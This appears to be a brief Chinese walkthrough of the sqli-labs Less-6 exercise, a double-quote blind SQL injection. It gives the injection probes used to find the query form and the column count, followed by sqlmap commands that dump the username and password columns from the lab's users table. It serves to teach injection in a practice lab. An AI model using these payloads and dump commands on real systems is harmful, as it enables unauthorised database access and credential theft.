sqli-lab刷题Less-6 基于盲注的双引号型sql注入

sqli-lab刷题Less-6 基于盲注的双引号型sql注入

输入?id=1\，报出错误

猜测其原语句为"$id" LIMIT 0,1

输入?id=1" --+

发现其不报错，说明猜测正确

输入?id=1" order by 3 --+,不报错，输入?id=1" order by 4 --+,报错

由此可以知道只有三个字段

输入?id=1" and 1=2 union select 1,2,3 --+，发现其不回显，说明为盲注

盲注具体看这篇文章sqli-lab刷题Less-5基于盲注的单引号型注入

可以使用sqlmap进行自动化探测。

输入

sqlmap -u 对应的url，注意提交参数 --current-db --batch

得到数据库

以此类推

爆出表名

sqlmap -u 对应的url，注意提交参数 -D security --tables --batch

 爆出列名

sqlmap -u 对应的url，注意提交参数 -D security -T users --columns ---batch

爆出字段值

sqlmap -u 对应的url，注意提交参数 -D security -T users -C password,username --dump --batch